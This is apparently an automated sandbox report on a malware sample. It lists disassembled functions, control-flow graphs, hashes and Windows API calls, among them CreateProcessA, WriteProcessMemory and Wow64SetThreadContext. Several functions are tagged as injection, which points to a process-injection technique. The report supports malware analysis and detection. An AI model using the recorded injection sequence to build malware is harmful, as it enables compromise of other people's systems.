                                                                        control_flow_graph 1237 91f34b8-91f34e0 1238 91f34e7-91f35a3 1237->1238 1239 91f34e2 1237->1239 1242 91f35a8-91f35b5 1238->1242 1243 91f35a5-91f35cb 1238->1243 1239->1238 1242->1243 1245 91f3abb-91f3afd 1243->1245 1246 91f35d1-91f35fb 1243->1246 1254 91f3b00-91f3b04 1245->1254 1249 91f3cc8-91f3cd4 1246->1249 1250 91f3601-91f3619 1246->1250 1253 91f3cda-91f3ce3 1249->1253 1252 91f361f-91f3620 1250->1252 1250->1253 1255 91f3cae-91f3cba 1252->1255 1260 91f3ce9-91f3cf5 1253->1260 1256 91f3b0a-91f3b10 1254->1256 1257 91f36d6-91f36da 1254->1257 1258 91f3625-91f3631 1255->1258 1259 91f3cc0-91f3cc7 1255->1259 1256->1245 1261 91f3b12-91f3b6d 1256->1261 1262 91f36ec-91f36f2 1257->1262 1263 91f36dc-91f36ea 1257->1263 1264 91f3638-91f3653 1258->1264 1265 91f3633 1258->1265 1266 91f3cfb-91f3d07 1260->1266 1286 91f3b6f-91f3ba2 1261->1286 1287 91f3ba4-91f3bce 1261->1287 1268 91f3737-91f373b 1262->1268 1267 91f374a-91f377c 1263->1267 1264->1260 1269 91f3659-91f367e 1264->1269 1265->1264 1273 91f3d0d-91f3d14 1266->1273 1291 91f377e-91f378a 1267->1291 1292 91f37a6 1267->1292 1270 91f373d 1268->1270 1271 91f36f4-91f3700 1268->1271 1269->1266 1279 91f3684-91f3686 1269->1279 1274 91f3740-91f3744 1270->1274 1276 91f3707-91f370f 1271->1276 1277 91f3702 1271->1277 1274->1267 1280 91f36bc-91f36d3 1274->1280 1282 91f3734 1276->1282 1283 91f3711-91f3725 1276->1283 1277->1276 1285 91f3689-91f3694 1279->1285 1280->1257 1282->1268 1284 91f372b-91f3732 1283->1284 1283->1285 1284->1270 1285->1273 1289 91f369a-91f36b7 1285->1289 1300 91f3bd7-91f3c56 1286->1300 1287->1300 1289->1274 1295 91f378c-91f3792 1291->1295 1296 91f3794-91f379a 1291->1296 1293 91f37ac-91f37d9 1292->1293 1304 91f37db-91f3813 1293->1304 1305 91f3828-91f38bb 1293->1305 1301 91f37a4 1295->1301 1296->1301 1312 91f3c5d-91f3c70 1300->1312 1301->1293 1313 91f3c7f-91f3c84 1304->1313 1320 91f38bd 1305->1320 1321 91f38c4-91f38c5 1305->1321 1312->1313 1314 91f3c9b-91f3cab 1313->1314 1315 91f3c86-91f3c94 1313->1315 1314->1255 1315->1314 1320->1321 1322 91f3916-91f391c 1321->1322 1323 91f391e-91f39e0 1322->1323 1324 91f38c7-91f38e6 1322->1324 1335 91f39e2-91f3a1b 1323->1335 1336 91f3a21-91f3a25 1323->1336 1325 91f38ed-91f3913 1324->1325 1326 91f38e8 1324->1326 1325->1322 1326->1325 1335->1336 1337 91f3a27-91f3a60 1336->1337 1338 91f3a66-91f3a6a 1336->1338 1337->1338 1339 91f3a6c-91f3aa5 1338->1339 1340 91f3aab-91f3aaf 1338->1340 1339->1340 1340->1261 1343 91f3ab1-91f3ab9 1340->1343 1343->1254
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$:$pxq$~
                                                                        • API String ID: 0-2366959149
                                                                        • Opcode ID: 2e009b4d77ac60da5230bdd814517acc3e1d99a17436139f9784726d41eb44f6
                                                                        • Instruction ID: 931ed2775a198bdd27bcd77581564e3e39d12cc2447b998d7ad621c922516662
                                                                        • Opcode Fuzzy Hash: 2e009b4d77ac60da5230bdd814517acc3e1d99a17436139f9784726d41eb44f6
                                                                        • Instruction Fuzzy Hash: 1342E375E00228DFDB19CFA9C950B99BBB2FF48304F1580E9E619AB261D731AD91DF10
                                                                        Function 078562C8 Relevance: .3, Instructions: 335COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be7aa95f9caf766e4748e1df87fc78016e3d86d52dd74237554d2cf6f632698f
                                                                        • Instruction ID: ee38291218a30209006f897e168e2961ff0e9c0b8b325e53429ecc655d52c9dd
                                                                        • Opcode Fuzzy Hash: be7aa95f9caf766e4748e1df87fc78016e3d86d52dd74237554d2cf6f632698f
                                                                        • Instruction Fuzzy Hash: 13C18AB07007068FDB29DB79C450BAEB7FAAF99B00F54846DD546CB690EB35E801CB52
                                                                        Function 07851D18 Relevance: .1, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 620fa7c79930c8886174b663be9f8c30aca50cfa76aaa45e1c4d0b0f5cf51a5a
                                                                        • Instruction ID: 7129ba11af77b20525c1257e25cd7cdf8bda883732868b485fe1140b48fb87ae
                                                                        • Opcode Fuzzy Hash: 620fa7c79930c8886174b663be9f8c30aca50cfa76aaa45e1c4d0b0f5cf51a5a
                                                                        • Instruction Fuzzy Hash: 25313AB8D1A20CCBDB04CFA6E5483EDBBFAAFAE314F04A025D809E7241DB744546CE10
                                                                        Function 078547DE Relevance: .0, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f486b8367d0923aaed10a591a73b66883d533ebaa0b15c55eb97eda4ca85802d
                                                                        • Instruction ID: 4e0e8ccf5882eadfcd17280a0ddded2d3d7e49913eecb7aa8632f945d3f0a0b8
                                                                        • Opcode Fuzzy Hash: f486b8367d0923aaed10a591a73b66883d533ebaa0b15c55eb97eda4ca85802d
                                                                        • Instruction Fuzzy Hash: 0CE0B6B9D6919CCBCB00DF98E4455F8BBF8AB9B225F0020A69C0DE3211DA3199958E15
                                                                        Function 0150CFF1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1193 150cff1-150d08f GetCurrentProcess 1197 150d091-150d097 1193->1197 1198 150d098-150d0cc GetCurrentThread 1193->1198 1197->1198 1199 150d0d5-150d109 GetCurrentProcess 1198->1199 1200 150d0ce-150d0d4 1198->1200 1202 150d112-150d12d call 150d5d9 1199->1202 1203 150d10b-150d111 1199->1203 1200->1199 1206 150d133-150d162 GetCurrentThreadId 1202->1206 1203->1202 1207 150d164-150d16a 1206->1207 1208 150d16b-150d1cd 1206->1208 1207->1208
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D07E
                                                                        • GetCurrentThread.KERNEL32 ref: 0150D0BB
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D0F8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0150D151
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID: {s#
                                                                        • API String ID: 2063062207-3582909824
                                                                        • Opcode ID: 8e38488db9a200eeb4498fde71f4085e2640eb30ee2aa6974a5aa78389f944ee
                                                                        • Instruction ID: efaed2957cdaafd0bf4ec381f3716d75842b1ccff499e6afba97c09d17dde4f4
                                                                        • Opcode Fuzzy Hash: 8e38488db9a200eeb4498fde71f4085e2640eb30ee2aa6974a5aa78389f944ee
                                                                        • Instruction Fuzzy Hash: 985168B0900649CFDB15CFEACA48B9EBBF1FF48314F248859E409AB390D7345985CB65
                                                                        Function 0150D000 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1215 150d000-150d08f GetCurrentProcess 1219 150d091-150d097 1215->1219 1220 150d098-150d0cc GetCurrentThread 1215->1220 1219->1220 1221 150d0d5-150d109 GetCurrentProcess 1220->1221 1222 150d0ce-150d0d4 1220->1222 1224 150d112-150d12d call 150d5d9 1221->1224 1225 150d10b-150d111 1221->1225 1222->1221 1228 150d133-150d162 GetCurrentThreadId 1224->1228 1225->1224 1229 150d164-150d16a 1228->1229 1230 150d16b-150d1cd 1228->1230 1229->1230
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D07E
                                                                        • GetCurrentThread.KERNEL32 ref: 0150D0BB
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D0F8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0150D151
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID: {s#
                                                                        • API String ID: 2063062207-3582909824
                                                                        • Opcode ID: 07e654002976fc63505ff159fc993bbf0cd5d9f93feb5accbb688f41fe6ebf89
                                                                        • Instruction ID: c7c9c40cc24a2564a5a78258457acf6980422f3a83a05623906d19e59f345b46
                                                                        • Opcode Fuzzy Hash: 07e654002976fc63505ff159fc993bbf0cd5d9f93feb5accbb688f41fe6ebf89
                                                                        • Instruction Fuzzy Hash: EA5168B0900649CFDB15CFEACA48B9EBBF1FF88314F248459E419AB390D7345985CB65
                                                                        Function 07851164 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1345 7851164-7851205 1348 7851207-7851211 1345->1348 1349 785123e-785125e 1345->1349 1348->1349 1350 7851213-7851215 1348->1350 1356 7851297-78512c6 1349->1356 1357 7851260-785126a 1349->1357 1351 7851217-7851221 1350->1351 1352 7851238-785123b 1350->1352 1354 7851225-7851234 1351->1354 1355 7851223 1351->1355 1352->1349 1354->1354 1358 7851236 1354->1358 1355->1354 1365 78512ff-78513b9 CreateProcessA 1356->1365 1366 78512c8-78512d2 1356->1366 1357->1356 1359 785126c-785126e 1357->1359 1358->1352 1361 7851291-7851294 1359->1361 1362 7851270-785127a 1359->1362 1361->1356 1363 785127c 1362->1363 1364 785127e-785128d 1362->1364 1363->1364 1364->1364 1367 785128f 1364->1367 1377 78513c2-7851448 1365->1377 1378 78513bb-78513c1 1365->1378 1366->1365 1368 78512d4-78512d6 1366->1368 1367->1361 1370 78512f9-78512fc 1368->1370 1371 78512d8-78512e2 1368->1371 1370->1365 1372 78512e4 1371->1372 1373 78512e6-78512f5 1371->1373 1372->1373 1373->1373 1375 78512f7 1373->1375 1375->1370 1388 7851458-785145c 1377->1388 1389 785144a-785144e 1377->1389 1378->1377 1391 785146c-7851470 1388->1391 1392 785145e-7851462 1388->1392 1389->1388 1390 7851450 1389->1390 1390->1388 1394 7851480-7851484 1391->1394 1395 7851472-7851476 1391->1395 1392->1391 1393 7851464 1392->1393 1393->1391 1396 7851496-785149d 1394->1396 1397 7851486-785148c 1394->1397 1395->1394 1398 7851478 1395->1398 1399 78514b4 1396->1399 1400 785149f-78514ae 1396->1400 1397->1396 1398->1394 1402 78514b5 1399->1402 1400->1399 1402->1402
                                                                        APIs
                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078513A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: {s#${s#
                                                                        • API String ID: 963392458-4214758537
                                                                        • Opcode ID: 3ad53533fde9c95032ba8933d609d47e3746840ed85ec4578c7310262da5fa36
                                                                        • Instruction ID: e19b73f5e9f3da37d95bb228cd155a937db1babfd5c19f0c2ac44dec71cd26ce
                                                                        • Opcode Fuzzy Hash: 3ad53533fde9c95032ba8933d609d47e3746840ed85ec4578c7310262da5fa36
                                                                        • Instruction Fuzzy Hash: 7DA149B1D0065ACFDF14DFA8C845BEDBBB2BB58310F1485A9E808E7280DB749985CF91
                                                                        Function 07851170 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1403 7851170-7851205 1405 7851207-7851211 1403->1405 1406 785123e-785125e 1403->1406 1405->1406 1407 7851213-7851215 1405->1407 1413 7851297-78512c6 1406->1413 1414 7851260-785126a 1406->1414 1408 7851217-7851221 1407->1408 1409 7851238-785123b 1407->1409 1411 7851225-7851234 1408->1411 1412 7851223 1408->1412 1409->1406 1411->1411 1415 7851236 1411->1415 1412->1411 1422 78512ff-78513b9 CreateProcessA 1413->1422 1423 78512c8-78512d2 1413->1423 1414->1413 1416 785126c-785126e 1414->1416 1415->1409 1418 7851291-7851294 1416->1418 1419 7851270-785127a 1416->1419 1418->1413 1420 785127c 1419->1420 1421 785127e-785128d 1419->1421 1420->1421 1421->1421 1424 785128f 1421->1424 1434 78513c2-7851448 1422->1434 1435 78513bb-78513c1 1422->1435 1423->1422 1425 78512d4-78512d6 1423->1425 1424->1418 1427 78512f9-78512fc 1425->1427 1428 78512d8-78512e2 1425->1428 1427->1422 1429 78512e4 1428->1429 1430 78512e6-78512f5 1428->1430 1429->1430 1430->1430 1432 78512f7 1430->1432 1432->1427 1445 7851458-785145c 1434->1445 1446 785144a-785144e 1434->1446 1435->1434 1448 785146c-7851470 1445->1448 1449 785145e-7851462 1445->1449 1446->1445 1447 7851450 1446->1447 1447->1445 1451 7851480-7851484 1448->1451 1452 7851472-7851476 1448->1452 1449->1448 1450 7851464 1449->1450 1450->1448 1453 7851496-785149d 1451->1453 1454 7851486-785148c 1451->1454 1452->1451 1455 7851478 1452->1455 1456 78514b4 1453->1456 1457 785149f-78514ae 1453->1457 1454->1453 1455->1451 1459 78514b5 1456->1459 1457->1456 1459->1459
                                                                        APIs
                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078513A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: {s#${s#
                                                                        • API String ID: 963392458-4214758537
                                                                        • Opcode ID: 56246ea1f43043cb3da633cd9d54787065e10fccbb73f779214eb9286c0b311b
                                                                        • Instruction ID: 7b57334dbcc0003667839ca3ef3a4fdf8a3a24d6afe5c6694b1d12af7d549973
                                                                        • Opcode Fuzzy Hash: 56246ea1f43043cb3da633cd9d54787065e10fccbb73f779214eb9286c0b311b
                                                                        • Instruction Fuzzy Hash: B19138B1D0065ACFDF14CFA8C845BADBAB2BB58314F1485A9E808E7280DB749985CF91
                                                                        Function 0150AD68 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 195COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1483 150ad68-150ad77 1484 150ada3-150ada7 1483->1484 1485 150ad79-150ad86 call 150a08c 1483->1485 1486 150ada9-150adb3 1484->1486 1487 150adbb-150adfc 1484->1487 1492 150ad88-150ad96 call 150b000 1485->1492 1493 150ad9c 1485->1493 1486->1487 1494 150ae09-150ae17 1487->1494 1495 150adfe-150ae06 1487->1495 1492->1493 1499 150aed8-150af98 1492->1499 1493->1484 1497 150ae19-150ae1e 1494->1497 1498 150ae3b-150ae3d 1494->1498 1495->1494 1501 150ae20-150ae27 call 150a098 1497->1501 1502 150ae29 1497->1502 1500 150ae40-150ae47 1498->1500 1533 150afa0-150afcb GetModuleHandleW 1499->1533 1534 150af9a-150af9d 1499->1534 1503 150ae54-150ae5b 1500->1503 1504 150ae49-150ae51 1500->1504 1505 150ae2b-150ae39 1501->1505 1502->1505 1508 150ae68-150ae71 call 150a0a8 1503->1508 1509 150ae5d-150ae65 1503->1509 1504->1503 1505->1500 1514 150ae73-150ae7b 1508->1514 1515 150ae7e-150ae83 1508->1515 1509->1508 1514->1515 1517 150aea1-150aea5 1515->1517 1518 150ae85-150ae8c 1515->1518 1520 150aeab-150aeae 1517->1520 1518->1517 1519 150ae8e-150ae9e call 150a0b8 call 150a0c8 1518->1519 1519->1517 1523 150aeb0-150aece 1520->1523 1524 150aed1-150aed7 1520->1524 1523->1524 1535 150afd4-150afe8 1533->1535 1536 150afcd-150afd3 1533->1536 1534->1533 1536->1535
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0150AFBE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: {s#
                                                                        • API String ID: 4139908857-3582909824
                                                                        • Opcode ID: ff9f9aee07aa67178459edb5986457d589b32028ac48c2f068a77b08f27cb011
                                                                        • Instruction ID: d4704b17f00a81e85a7df64c175dc47a24390c6bcde3ce05ae846f3d702f5f50
                                                                        • Opcode Fuzzy Hash: ff9f9aee07aa67178459edb5986457d589b32028ac48c2f068a77b08f27cb011
                                                                        • Instruction Fuzzy Hash: 607116B0A00B458FD726DFA9D05075ABBF1BF88304F108A2DD446DBB90D775E949CB90
                                                                        Function 015044B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1539 15044b4-15059d9 CreateActCtxA 1542 15059e2-1505a3c 1539->1542 1543 15059db-15059e1 1539->1543 1550 1505a4b-1505a4f 1542->1550 1551 1505a3e-1505a41 1542->1551 1543->1542 1552 1505a60 1550->1552 1553 1505a51-1505a5d 1550->1553 1551->1550 1555 1505a61 1552->1555 1553->1552 1555->1555
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 015059C9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID: {s#
                                                                        • API String ID: 2289755597-3582909824
                                                                        • Opcode ID: 5ca6aa330140ebda8a9d48b4804d9d15675d2c076b3ab42ee032f2563acbf021
                                                                        • Instruction ID: 066c6a6d8f759298b2aae010473428c5bd86ef2ccacb830a2232b44b6d39feb9
                                                                        • Opcode Fuzzy Hash: 5ca6aa330140ebda8a9d48b4804d9d15675d2c076b3ab42ee032f2563acbf021
                                                                        • Instruction Fuzzy Hash: B841F2B0C00719CBDB25DFAAC885BCEBBF5BF49304F20845AD408AB251EB756946CF90
                                                                        Function 01505916 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1556 1505916-15059d9 CreateActCtxA 1558 15059e2-1505a3c 1556->1558 1559 15059db-15059e1 1556->1559 1566 1505a4b-1505a4f 1558->1566 1567 1505a3e-1505a41 1558->1567 1559->1558 1568 1505a60 1566->1568 1569 1505a51-1505a5d 1566->1569 1567->1566 1571 1505a61 1568->1571 1569->1568 1571->1571
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 015059C9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID: {s#
                                                                        • API String ID: 2289755597-3582909824
                                                                        • Opcode ID: 07150b112dacfedc29d674bac2e69bc3462cbb816a824bb959274aa598bfc4ad
                                                                        • Instruction ID: 224047636d0704914ce2a5de1a0725501b8ca716c6f901b8e22704d930390b63
                                                                        • Opcode Fuzzy Hash: 07150b112dacfedc29d674bac2e69bc3462cbb816a824bb959274aa598bfc4ad
                                                                        • Instruction Fuzzy Hash: 5A41F3B0C00759CEDB25DFAAC885BCEBBF5BF49304F20855AD408AB251DB756946CF50
                                                                        Function 07850EE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1572 7850ee0-7850ee4 1573 7850ee6-7850f36 1572->1573 1574 7850f48-7850f5c 1572->1574 1578 7850f46 1573->1578 1579 7850f38-7850f44 1573->1579 1581 7850f5e-7850f63 1574->1581 1582 7850f6a-7850f85 WriteProcessMemory 1574->1582 1578->1574 1579->1578 1581->1582 1583 7850f87-7850f8d 1582->1583 1584 7850f8e-7850fbe 1582->1584 1583->1584
                                                                        APIs
                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07850F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID: {s#
                                                                        • API String ID: 3559483778-3582909824
                                                                        • Opcode ID: 6156479f8e7411da7062765ba12480198233ab917a25588b1b578ab9a87dc7b2
                                                                        • Instruction ID: b5d7c4650fe18c57bc2c483da062e7342dac9003d44bf34789aa9b153d14c920
                                                                        • Opcode Fuzzy Hash: 6156479f8e7411da7062765ba12480198233ab917a25588b1b578ab9a87dc7b2
                                                                        • Instruction Fuzzy Hash: 14317CB19003499FDF10DFA9D881AEEBBF5FF58310F10842AE919AB281D7749945CF61
                                                                        Function 07850EE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1588 7850ee8-7850f36 1590 7850f46-7850f5c 1588->1590 1591 7850f38-7850f44 1588->1591 1595 7850f5e-7850f63 1590->1595 1596 7850f6a-7850f85 WriteProcessMemory 1590->1596 1591->1590 1595->1596 1597 7850f87-7850f8d 1596->1597 1598 7850f8e-7850fbe 1596->1598 1597->1598
                                                                        APIs
                                                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07850F78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID: {s#
                                                                        • API String ID: 3559483778-3582909824
                                                                        • Opcode ID: bff97e5e0ae6de92bb07815e0d924f04a658a423a6a2cc1d5c62ca638f290777
                                                                        • Instruction ID: e516630ef0d3172a180d34db08db11fad3161daa7aedfbee99b38450eea1c40e
                                                                        • Opcode Fuzzy Hash: bff97e5e0ae6de92bb07815e0d924f04a658a423a6a2cc1d5c62ca638f290777
                                                                        • Instruction Fuzzy Hash: A12139B59003599FDF10CFA9C881BDEBBF5FF48320F10842AE919A7240D7789944CBA1
                                                                        Function 07850FD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1613 7850fd0-7851065 ReadProcessMemory 1617 7851067-785106d 1613->1617 1618 785106e-785109e 1613->1618 1617->1618
                                                                        APIs
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07851058
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID: {s#
                                                                        • API String ID: 1726664587-3582909824
                                                                        • Opcode ID: b1ca9f301892dfccb62c917bae7b819798dfc30983cb74338cb33a4f11011d3d
                                                                        • Instruction ID: 16dcb93995a8e02ef4ecaef67bcad188d5ef5ab8b1bcba4739f7b4fd187aaacc
                                                                        • Opcode Fuzzy Hash: b1ca9f301892dfccb62c917bae7b819798dfc30983cb74338cb33a4f11011d3d
                                                                        • Instruction Fuzzy Hash: 4F2139B1C002599FDF10CFAAC885AEEBBF5FF48320F14842AE519A7241C7759540CBA1
                                                                        Function 07850D48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1602 7850d48-7850d9b 1605 7850d9d-7850da9 1602->1605 1606 7850dab-7850ddb Wow64SetThreadContext 1602->1606 1605->1606 1608 7850de4-7850e14 1606->1608 1609 7850ddd-7850de3 1606->1609 1609->1608
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07850DCE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID: {s#
                                                                        • API String ID: 983334009-3582909824
                                                                        • Opcode ID: ab133258b2a2419c9a1ad6e00c9c6c4aa93de4c2a194f26871a08322f9ac9437
                                                                        • Instruction ID: 5050fcd8a02ae9ddaaf48d8f22d06f075784478521d78c5ec960256bdf3d8c63
                                                                        • Opcode Fuzzy Hash: ab133258b2a2419c9a1ad6e00c9c6c4aa93de4c2a194f26871a08322f9ac9437
                                                                        • Instruction Fuzzy Hash: 61216AB19002498FDB10CFAAC4857EEBFF4EF98324F14842ED419A7241CB78A945CFA5
                                                                        Function 0150D648 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1622 150d648-150d6e4 DuplicateHandle 1623 150d6e6-150d6ec 1622->1623 1624 150d6ed-150d70a 1622->1624 1623->1624
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150D6D7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID: {s#
                                                                        • API String ID: 3793708945-3582909824
                                                                        • Opcode ID: c24e8722945f506a1c8f13b488607b48d2b87121c215a4be58647a14fd268b0a
                                                                        • Instruction ID: 3e308d1d7e27b3c8bad39193f1a9be2a97be601465d1ffcfbde23f845399ecc9
                                                                        • Opcode Fuzzy Hash: c24e8722945f506a1c8f13b488607b48d2b87121c215a4be58647a14fd268b0a
